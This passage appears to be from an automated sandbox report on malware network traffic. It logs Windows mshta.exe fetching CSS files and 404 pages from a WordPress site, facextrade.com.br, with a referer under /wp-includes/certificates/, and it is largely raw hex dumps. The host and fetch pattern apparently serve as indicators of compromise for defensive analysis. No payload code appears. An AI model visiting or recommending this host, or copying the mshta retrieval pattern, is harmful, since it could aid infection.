                                        Data Ascii: /* #Shortcodes================================================== *//* Recent Posts Shortcodes---------------------------------------- */.recent-posts { overflow: hidden; margin: 0 0 0 -20px !important; padding: 0; border: none; list-style: none; /* Images Format Type */ /* Quote Format Type */ /* Link Format Type */ /* Audio Format Type */ /* Video Format Type */}.recent-posts_li { margin: 0 0 20px 20px; padding: 0; border: none; background: none; list-style-type: none;}.recent-posts_li .featured-thumbnail { float: left; margin: 0 20px 0 0;}.recent-posts_li h5 { margin-bottom: 0; font-size: 1em;}.recent-posts_li .excerpt { margin-bottom: 1.5em;}.recent-posts_li .meta { display: block; overflow: hidden; margin-bottom: .5em; color: #888; text-transform: uppercase; font-size: 10px;}.recent-posts_li .post-date { float: left;}.recent-posts_li .post-comments { float: right;}.recent-posts .format-image { float: left; margin: 0 20px 20px 0;}.recent-posts .format-audio { margin-bottom: 2em;}.recent-posts
                                        Aug 16, 2022 10:48:43.936311960 CEST427INData Raw: 2e 66 6f 72 6d 61 74 2d 61 75 64 69 6f 20 2e 61 75 64 69 6f 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 20 2e 66 6f 72 6d 61 74 2d 76 69 64 65
                                        Data Ascii: .format-audio .audio-wrapper { margin-bottom: .5em;}.recent-posts .format-video { float: left; width: 300px;}/* Popular Posts Shortcode---------------------------------------- */.popular-posts li { overflow: hidden; margin: 0;
                                        Aug 16, 2022 10:48:43.936347961 CEST428INData Raw: 75 6d 62 6e 61 69 6c 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 2e 6d 69 6e 69 2d 70 6f 73 74 73 2d 67 72 69 64 2e 67 72 69 64 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72
                                        Data Ascii: umbnail { margin: 0;}.mini-posts-grid.grid-align-center { text-align: center; font-size: 0; line-height: 0;}.mini-posts-grid.grid-align-center li { float: none; display: inline-block;}.mini-posts-grid.grid-align-right li {
                                        Aug 16, 2022 10:48:43.936384916 CEST430INData Raw: 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 64 64 64 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a
                                        Data Ascii: background-color: #f5f5f5; border: 1px solid #dddddd; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0
                                        Aug 16, 2022 10:48:43.936420918 CEST431INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 2f 2a 20 50 6f 73 74 20 43 79 63 6c 65 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                        Data Ascii: -------------------------- *//* Post Cycle---------------------------------------- */.carousel-cycle { position: relative; overflow: hidden;}.post-cycle { width: 100%; height: 380px; overflow: hidden;}.post-cycle_item { disp
                                        Aug 16, 2022 10:48:43.936453104 CEST432INData Raw: 72 61 70 20 2e 66 65 61 74 75 72 65 64 2d 74 68 75 6d 62 6e 61 69 6c 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 35 70 78 3b 0a 20
                                        Data Ascii: rap .featured-thumbnail { float: none; overflow: hidden; margin: 0 0 15px; padding: 0;}.banner-wrap .featured-thumbnail a { display: block; float: left; overflow: hidden; border: 8px solid #dddddd; text-align: center; -we
                                        Aug 16, 2022 10:48:43.936486959 CEST434INData Raw: 0a 7d 0a 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 73 20 2e 74 65 73 74 69 2d 69 74 65 6d 20 62 6c 6f 63 6b 71 75 6f 74 65 3a 61 66 74 65 72 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 31 30 70 78 3b
                                        Data Ascii: }.testimonials .testi-item blockquote:after { position: absolute; top: 10px; left: 20px; display: block; width: 41px; height: 38px; background: url(../images/quotes.png) 0 0 no-repeat; content: "";}.testimonials .testi-item
                                        Aug 16, 2022 10:48:43.936520100 CEST435INData Raw: 6c 64 65 72 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 35 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 7d 0a 2e 72 6f 75 6e 64 61 62 6f 75 74 2d 68 6f 6c 64 65 72 20 75 6c 20 6c 69 2e 72 6f 75 6e 64 61 62 6f 75
                                        Data Ascii: lder ul li { width: 150px !important; }}.roundabout-holder ul li.roundabout-in-focus { cursor: default;}@media (min-width: 768px) and (max-width: 979px) { .roundabout-holder ul { width: 100%; }}@media (max-width: 767px) {
                                        Aug 16, 2022 10:48:43.936552048 CEST437INData Raw: 64 74 68 3a 20 34 38 30 70 78 29 20 7b 0a 20 20 2e 73 69 74 65 5f 6d 61 70 20 2e 6c 69 6e 65 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 66 6c 6f 61 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6d 61 72 67
                                        Data Ascii: dth: 480px) { .site_map .line ul li { float: none; width: 100%; margin-right: 0%; }}/* Accordion, Tabs (bootstrap)---------------------------------------- */.accordion-group,.accordion-inner,.nav-tabs,.nav-tabs > .active
                                        Aug 16, 2022 10:48:43.936585903 CEST438INData Raw: 20 30 70 78 20 31 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 30 39 29 3b 0a 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 30 70 78 20 31 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 30 39 29
                                        Data Ascii: 0px 13px rgba(0, 0, 0, 0.09); -moz-box-shadow: 0px 0px 13px rgba(0, 0, 0, 0.09); -webkit-box-shadow: 0px 0px 13px rgba(0, 0, 0, 0.09); -o-box-shadow: 0px 0px 13px rgba(0, 0, 0, 0.09);}.price-plans .plan.highlight h3 { padding: 22px
                                        Aug 16, 2022 10:48:44.153158903 CEST440INData Raw: 74 61 6e 74 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 2e 70 72 69 63 65 2d 70 6c 61 6e 73 20 2e 70 6c 61 6e 20 68 33 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 32 30
                                        Data Ascii: tant; margin-left: 0; }}.price-plans .plan h3 { margin: 0; padding: 20px 10px; background: #e1e4e5; color: #32393d; border-bottom: 1px solid #fff; font-weight: bold;}.price-plans .plan h4 { margin: 0; padding: 10px;


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.2249186187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:44.116972923 CEST439OUTGET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:45.200921059 CEST461INHTTP/1.1 404 Not Found
                                        Date: Tue, 16 Aug 2022 08:48:44 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68
                                        Data Ascii: 104f<!DOCTYPE html>...[if lt IE 7 ]><html class="ie ie6" lang="pt-BR"> <![endif]-->...[if IE 7 ]><html class="ie ie7" lang="pt-BR"> <![endif]-->...[if IE 8 ]><html class="ie ie8" lang="pt-BR"> <![endif]-->...[if IE 9 ]><html class="ie ie9" lang="pt-BR"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html lang="pt-BR"> ...<![endif]--><head><title>Error 404 Not Found | Facex</title><meta name="description" content=" &raquo; Pgina no encontrada | Facex Comrcio Exterior Ltda." /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11" /><link rel="icon" href="http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico" type="image/x-icon" /><link rel="pingback" href="http://facextrade.com.br/xmlrpc.php" /><link rel="alternate" type="application/rss+xml" title="Facex" href="https://facextrade.com.br/feed/" /><link rel="alternate" type="application/atom+xml" title="Facex" href="h
                                        Aug 16, 2022 10:48:45.201005936 CEST462INData Raw: 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 61 74 6f 6d 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65
                                        Data Ascii: ttps://facextrade.com.br/feed/atom/" /><link rel="stylesheet" type="text/css" media="all" href="http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css" /><link rel="stylesheet" type="text/css" media="all" href="h
                                        Aug 16, 2022 10:48:45.201045036 CEST463INData Raw: 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 34 2e 39 2e 32 30 22 7d 7d 3b 0a 09 09 09 21 66 75 6e 63 74
                                        Data Ascii: cextrade.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.20"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p
                                        Aug 16, 2022 10:48:45.201080084 CEST464INData Raw: 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65
                                        Data Ascii: pports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload
                                        Aug 16, 2022 10:48:45.203442097 CEST466INData Raw: 31 30 31 64 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61
                                        Data Ascii: 101d<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em
                                        Aug 16, 2022 10:48:45.203485012 CEST467INData Raw: 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d
                                        Data Ascii: t-awesome.css?ver=3.2.1' type='text/css' media='all' /><link rel='stylesheet' id='cherry-plugin-css' href='http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1' type='text/css' media='all' /><
                                        Aug 16, 2022 10:48:45.203524113 CEST468INData Raw: 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 67 78 2d 6c 6f 67 6f 2d 73
                                        Data Ascii: ss?ver=1.0.0' type='text/css' media='all' /><link rel='stylesheet' id='lgx-logo-slider-animate-css' href='http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20' type='text/css' media='al
                                        Aug 16, 2022 10:48:45.203556061 CEST469INData Raw: 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 43 68 65 72 72 79 46 72 61 6d 65 77 6f 72 6b 2f 6a 73 2f 6a 71 75 65 72 79
                                        Data Ascii: ascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2'></script>
                                        Aug 16, 2022 10:48:45.210089922 CEST470INData Raw: 31 30 37 66 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67
                                        Data Ascii: 107f<script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/li
                                        Aug 16, 2022 10:48:45.210134029 CEST471INData Raw: 2f 6a 73 2f 6c 6f 67 6f 2d 73 6c 69 64 65 72 2d 77 70 2d 70 75 62 6c 69 63 2e 6a 73 3f 76 65 72 3d 31 2e 30 2e 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73
                                        Data Ascii: /js/logo-slider-wp-public.js?ver=1.0.0'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1'></script><script type='text/javascript' src='http://fac
                                        Aug 16, 2022 10:48:45.412224054 CEST473INData Raw: 4c 20 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 27 2c 0a 09 20 50 41 52 45 4e 54 5f 55 52 4c 20 3d 20 27 68 74 74 70 3a 2f
                                        Data Ascii: L ='http://facextrade.com.br/wp-content/themes/theme51253', PARENT_URL = 'http://facextrade.com.br/wp-content/themes/CherryFramework', CURRENT_THEME = 'theme51253'</script><style type='text/css'>body { background-image:url(http://facext


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.2249187187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:44.373410940 CEST459OUTGET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:45.524857998 CEST493INHTTP/1.1 404 Not Found
                                        Date: Tue, 16 Aug 2022 08:48:44 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68
                                        Data Ascii: 104f<!DOCTYPE html>...[if lt IE 7 ]><html class="ie ie6" lang="pt-BR"> <![endif]-->...[if IE 7 ]><html class="ie ie7" lang="pt-BR"> <![endif]-->...[if IE 8 ]><html class="ie ie8" lang="pt-BR"> <![endif]-->...[if IE 9 ]><html class="ie ie9" lang="pt-BR"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html lang="pt-BR"> ...<![endif]--><head><title>Error 404 Not Found | Facex</title><meta name="description" content=" &raquo; Pgina no encontrada | Facex Comrcio Exterior Ltda." /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11" /><link rel="icon" href="http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico" type="image/x-icon" /><link rel="pingback" href="http://facextrade.com.br/xmlrpc.php" /><link rel="alternate" type="application/rss+xml" title="Facex" href="https://facextrade.com.br/feed/" /><link rel="alternate" type="application/atom+xml" title="Facex" href="h
                                        Aug 16, 2022 10:48:45.524883032 CEST494INData Raw: 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 61 74 6f 6d 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65
                                        Data Ascii: ttps://facextrade.com.br/feed/atom/" /><link rel="stylesheet" type="text/css" media="all" href="http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css" /><link rel="stylesheet" type="text/css" media="all" href="h
                                        Aug 16, 2022 10:48:45.524899960 CEST496INData Raw: 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 34 2e 39 2e 32 30 22 7d 7d 3b 0a 09 09 09 21 66 75 6e 63 74
